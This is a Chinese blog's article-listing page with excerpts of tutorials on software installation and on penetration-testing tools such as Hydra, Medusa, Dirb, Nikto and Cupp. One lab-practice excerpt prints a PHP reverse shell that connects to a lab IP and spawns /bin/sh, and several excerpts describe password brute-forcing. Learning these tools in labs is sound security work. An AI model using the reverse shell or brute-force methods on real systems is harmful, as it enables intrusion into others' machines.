工具
关注
分享
扫一扫
文章平均质量分 75
liver100day
年少不得之物,终将究其一生
展开
-
MySQL下载和安装教程
MySQL下载和安装教程下载MySQL数据库可以访问官方网站:https://www.mysql.com/点击DOWNLOADS模块下的Community模块,进行下载或可访问网页:https://dev.mysql.com/downloads/mysql/直接下载MySQL社区服务版进入,选择MySQL的版本及主机目前最新版本是:MySQL Community Server 8.0.27,点击下载点击后进入下一页面,该页面可注册MySQL账户,可登录MySQL账户,也可不进行注册,直接下原创 2021-11-25 10:52:27 · 54901 阅读 · 8 评论 -
Windows 7 Windows 10配置共享文件夹
文章目录1、准备1.1 关闭防火墙1.2 开启文件共享下载共享文件后言平时我们在工作或学习中中经常需要将自己的文件复制给他人或者将他人的文件复制过来的需求。然而部分情况是需要复制的文件太大,使用u盘,使用qq或者飞秋等软件无法进行复制,没有办法进行数据的传输。那么这个时候如果你和目标在同一个局域网中,配置文件共享进行数据的传输的优点就显现出来了。1、准备最简单的方法是,使用一根网线连接两台电脑。传送文件机和接收文件机均需要单击网络,选择打开“网络和Internet”设置点击更改适配器选项禁用原创 2021-11-25 09:40:48 · 1867 阅读 · 0 评论 -
常见端口及对应服务
端口简介21端口:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。22端口:ssh 服务,传统的网络服务程序,SSH的英文全称是Secure SHell。通过使用SSH,你可以把所有传输的数据进行加密,这样“中间人”这种攻击方式就不可能实现了,而且也能够防止DNS和IP欺骗。还有一个额外的好处就是传输的数据是经过压缩的,所以可以加快传输的速度。SSH有很多功能,它既可以代替telnet,又可以为ftp、pop、甚至ppp提供一个安全的“通道”。23端口:23端原创 2021-11-19 08:49:14 · 23588 阅读 · 0 评论 -
一款黑科技神器:uTools
简介uTools 是一个极简、插件化、跨平台的现代桌面软件。通过自由选配丰富的插件,打造你得心应手的工具集合。当你熟悉它后,能够为你节约大量时间,让你可以更加专注地改变世界。下载地址官网地址:https://u.tools/utools 支持 Windows/Mac/Linux下载:https://u.tools/download.html使用技巧快捷键 Alt+Space安装成功之后,可以通过快捷键 Alt+Space,可以唤起 utools 窗口ESC 键 快速回到主输入框在任何进入原创 2021-11-18 17:08:53 · 9087 阅读 · 0 评论 -
web网站目录爆破工具Dirb使用指南
文章目录工具简介命令参数基本使用列举具有特定扩展名列表的目录将输出保存到磁盘忽略不必要的状态码速度延迟不递归(-r)显示不存在页面不对网址(-t)强制使用结尾的“ /”HTTP授权进行扫描代理网址后言工具简介dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。 采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。命令参数格式:dirb <url_b原创 2021-11-18 16:22:45 · 21517 阅读 · 1 评论 -
Web漏洞扫描神器Nikto使用指南
文章目录工具简介工具下载链接nikto安装nikto基础语句指定端口进行扫描指定目录进行扫描多目标扫描其他功能扫描结果输出Nikto扫描交互参数IDS 躲避使用代理扫描后言工具简介Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件/CGIs;超过625种服务器版本;超过230种特定服务器问题。扫描项和插件可以自动更新(如果需要)。但其软件本身并不经常更新,最新和最危险的可能会检测不到。工具下载链接官方网站:https://cir原创 2021-11-18 09:29:33 · 24519 阅读 · 2 评论 -
Windows操作系统——WindowsVulnScan提权辅助工具简介与使用教程
文章目录WindowsVulnScan提权辅助工具简介与使用教程1.工具简介2.工具使用教程1、运行powershell脚本KBCollect.ps1收集信息2.进入powershell3.输入脚本名称并运行4.KBCollect.ps1脚本运行结束后,会在当前目录生成一个KB.json文件,该文件详细描述当前操作系统的版本信息与已经打过的漏洞补丁信息5.运行python脚本cve-check.py -u 创建CVEKB数据库6.运行python脚本7.运行python脚本后言WindowsVulnSca原创 2021-11-16 15:54:13 · 12307 阅读 · 0 评论 -
kali如何安装蚁剑
文章目录1.已有蚁剑源码安装2.没有蚁剑源码安装3.蚁剑源码下载1.已有蚁剑源码安装从 v2.0.0-beta 版本开始,用户/开发者只需要下载对应平台的加载器,无需安装额外的环境,即可对源代码进行编辑/执行/调试等操作。可直接运行当前最新的开发版和发行版源代码。如果已经有蚁剑源码了,就只需要下载加载器即可使用蚁剑了新建一个文件夹,文件夹中不能包含中文在我们新创建的 antsword 目录下 下载加载器加载器下载地址:https://github.com/AntSwordProject/AntS原创 2021-09-10 15:57:27 · 16317 阅读 · 13 评论 -
wpscan 工具使用教程
1.简介WPScan是Kali Linux默认自带的一款漏洞扫描工具, 它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots. txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能2.常用命令查看帮助信息 wpscan -h2. 更新原创 2021-06-05 09:41:07 · 6815 阅读 · 2 评论 -
Kali Linux下社工密码字典生成工具Cupp 使用教程
1.cupp 简介Cupp是一款用Python语言写成的可交互性的字典生成脚本。尤其适合社会工程学,当你收集到目标的具体信息后,你就可以通过这个工具来智能化生成关于目标的字典。当对目标进行渗透测试的时候,常见密码爆破不成功,大批量的字典耗时太长时,就需要一份结合具体目标的带社工性质的字典,可以很大提升爆破效率,这时候就可以利用Cupp打造一份。2.cupp 下载安装,使用在kali下安装cupp的方法有两种:1、手工在github上下载。https://github.com/jeanphorn原创 2021-06-04 15:35:33 · 3407 阅读 · 0 评论 -
Arp-scan 使用教程
arp-scan 使用教程arp-scan 简介arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具允许用户定制ARP包,构建非标准数据包。同时,该工具会自动解析Mac地址,给出MAC对应的硬件厂商,帮助用户确认目标。什么是ARP地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保原创 2021-06-04 14:50:50 · 9563 阅读 · 0 评论 -
medusa 使用教程
密码爆破:medusa(美杜莎)使用方法1.工具介绍Medusa工具是通过并行登陆暴力破解的方法,尝试获取远程验证服务访问权限,它支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP(AUTH/VRFY), SNMP, SSHv2, SVN, Telnet,VmAuthd, VNC,是一个不择不扣的密码破解工原创 2021-06-03 17:00:13 · 6344 阅读 · 0 评论 -
Hydra 使用方法
Hydra(爆破神器)使用方法1.工具介绍hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,可以在终端直接打开2.参数介绍-l 指定单个用户名,适合在知道用户名爆破时使用-L 指定多个用户名,参数值为存储用户名的文件的路径(建议使用文件绝对路径)-p 指定单个密码,适合在知道用户密码进行爆破时使用-P 指定多个密码,参数值为存贮密码的文件(通常称为字典)的路径(建议使用文件绝对路径)-C 当用户名和密码存储到一个文件时使用此原创 2021-06-03 16:20:48 · 6448 阅读 · 0 评论 -
Python搭建简易HTTP服务(3.x版本和2.x版本的)
Python搭建简易HTTP服务(3.x版本和2.x版本的)在平时的靶机练习中,时常会遇到我们已经通过漏洞,得到了目标靶机的最低权限,面临提权问题这种情况。于是我就会用到下面这个方法来解决一.生成一个木马在本机上准备一个php文件,写入<?php$sock=fsockopen("192.168.75.128",9966);exec("/bin/sh -i <&3 >&3 2>&3");?>(注意:这里的ip地址192.168.75.1原创 2021-05-17 11:17:07 · 522 阅读 · 0 评论 -
vulnhub靶机BSides-Vancouver-2018-Workshop渗透笔记
渗透测试实战–BSides-Vancouver-2018-Workshop靶机下载/安装靶机下载地址:https://www.vulnhub.com/entry/brainpan-1,51/靶机IP地址:未知kali渗透机地址:192.168.75.1281.主机发现原创 2021-05-15 13:01:50 · 583 阅读 · 0 评论 -
git下载安装教程
git下载安装教程前言:因为最近突然对使用github搭建一个自己的网站并绑定域名特别着迷,但是前提条件是必须得安装git,于是便把安装过程记录下来,便利自己,帮助他人。1.访问git官网下载最新版本git官方网页:https://git-scm.com/download/win在git官网中,有不同操作系统下的git,选择符合自己电脑版本的进行下载就可以了这里我选择的windows,然后根据自己电脑是32位还是64位,在下面两个选项中选择选择好了静待其下好就好了或许会有下载缓慢或无法下原创 2021-04-20 21:50:08 · 3669 阅读 · 0 评论 -
Webug靶场平台下载以及安装教程
Webug靶场平台下载以及安装教程一.基础介绍WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug 的 4.0 版本。二.详细操作解析1.安装需要使用到VM,这里附上VM的官网原创 2021-04-19 09:54:26 · 6684 阅读 · 1 评论